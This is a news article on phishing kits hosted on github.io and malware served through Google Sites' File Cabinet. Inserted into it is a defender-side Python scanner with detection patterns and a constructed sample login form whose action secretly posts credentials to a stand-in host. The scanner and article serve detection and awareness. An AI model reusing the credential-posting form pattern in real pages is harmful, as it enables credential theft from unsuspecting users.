Cybercriminals will host their attack infrastructure anywhere, even on GitHub code-sharing repositories.
Researchers from Proofpoint found that cybercriminals have been hosting phishing sites on GitHub’s free code repositories since at least mid-2017. The kits do not use the typical hosted PHP methods because GitHub’s github.io platform does not provide PHP back-end services. Instead, the phishing landing page was modified to call a PHP script hosted on a remote domain rather than one bundled with the kit.
While all of the identified GitHub accounts hosting phishing material have been taken down as of April 19, enterprise defenders should be aware of potential malicious sites using the canonical $github_username.github.io domains.
“Sending stolen credentials to another compromised website appears to be commonplace for all the active phishing kits we have observed on github.io,” the researchers wrote.
The HTML code to send credentials in an HTTP POST request to another site was lightly encoded to obfuscate its original purpose, the researchers said. In some cases, the github.io domain was used only to redirect users to the actual malicious site. This way, the criminals could ensure the actual phishing page remained active longer.
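A defender-side check for the two patterns described above (a github.io page whose credential form posts to another domain, or a page that merely redirects off-host), added here as an example and not part of Proofpoint's research. It assumes percent-encoding as the "light encoding" and unescape/decodeURIComponent as the decoder calls; the sample HTML is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

GITHUB_PAGES = re.compile(r"^[a-z0-9-]+\.github\.io$", re.I)
# Script that sets a form target or redirects the browser, optionally through a decoder call.
# The decoder names are assumptions about how a kit might hide its endpoint, not from the report.
JS_TARGET = re.compile(r"(\.action|location(?:\.href)?)\s*=\s*"
                       r"(?:(?:unescape|decodeURIComponent)\()?\s*['\"]([^'\"]+)['\"]")

def decode_target(value):
    """Undo percent-encoding (the assumed 'light encoding') so the real destination host is visible."""
    return unquote(value.strip())

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.targets, self.has_password = [], False  # (kind, raw_target) pairs
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and a.get("action"):
            self.targets.append(("form", a["action"]))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content", ""), re.I)
            if m:
                self.targets.append(("redirect", m.group(1)))
    def handle_data(self, data):  # inline <script> bodies arrive here
        for kw, url in JS_TARGET.findall(data):
            self.targets.append(("form" if kw == ".action" else "redirect", url))

def audit_page(page_url, html):
    """Return (finding, external_host) pairs for a *.github.io page; [] when nothing leaves the host."""
    host = (urlparse(page_url).hostname or "").lower()
    if not GITHUB_PAGES.match(host):
        return []
    s = _Scanner()
    s.feed(html)
    findings = []
    for kind, raw in s.targets:
        ext = (urlparse(decode_target(raw)).hostname or "").lower()
        if ext and ext != host and (kind == "redirect" or s.has_password):
            findings.append(("offsite-redirect" if kind == "redirect" else "credential-form-posts-offsite", ext))
    return findings

# Constructed sample: a login form whose target is set in script from a percent-encoded string.
SAMPLE_HTML = ('<form id="f" method="post"><input name="u"><input type="password" name="p"></form>'
               '<script>document.getElementById("f").action = unescape("https%3A%2F%2Fexample.net%2Fpost.php");</script>')
```

Run `audit_page` over fetched pages for the `*.github.io` hosts seen in your proxy or mail-gateway logs; a hit on either finding is a candidate for blocking and for a takedown report.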
Criminals have previously abused legitimate cloud storage sites, social networking sites, and commerce services to host their attacks. “Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint said.
Abuse Trusted Sites
Cybercriminals have a history of using free web services such as Dropbox, Google Drive, PayPal, eBay, and Facebook to host their attack campaigns. Recently, researchers from Netskope Threat Research Labs uncovered a group using the file cabinet template in Google Sites to deliver banking Trojans to Portuguese-speaking victims based in Brazil. Netskope noticed the attack earlier this month.
“Our Terms of Service prohibit the spreading of malicious content on our services, and we proactively scan Google Sites attachments for abusive or malicious content. In addition, we offer security protections for users by warning them of known malicious URLs through Google Chrome's Safe Browsing filters,” a Google spokesperson said.
Google File Cabinet lets users upload files to be hosted on a Google Sites page, so the criminals used the feature to upload malware and include the links in phishing emails. When victims click on the links—which show up as Google URLs in the email—they are taken to the malicious website and hit with a drive-by-download attack. While Google blocks malicious file uploads in many of its services, such as Gmail, that does not seem to be the case with Google File Cabinet.
“Users place an implicit trust to vendors like Google. As a result, they are more likely to fall victim to an attack launched from within a Google service,” wrote Ashwin Vamshi, a security researcher at Netskope.
Using trusted services such as Google, Office 365, Dropbox, and in some cases GitHub, lets criminals avoid the filters and scanners that block malicious attachments from reaching victim inboxes. Criminals are also banking on the likelihood that even users trained to avoid attachments will still click on links, especially links to a site or service they recognize.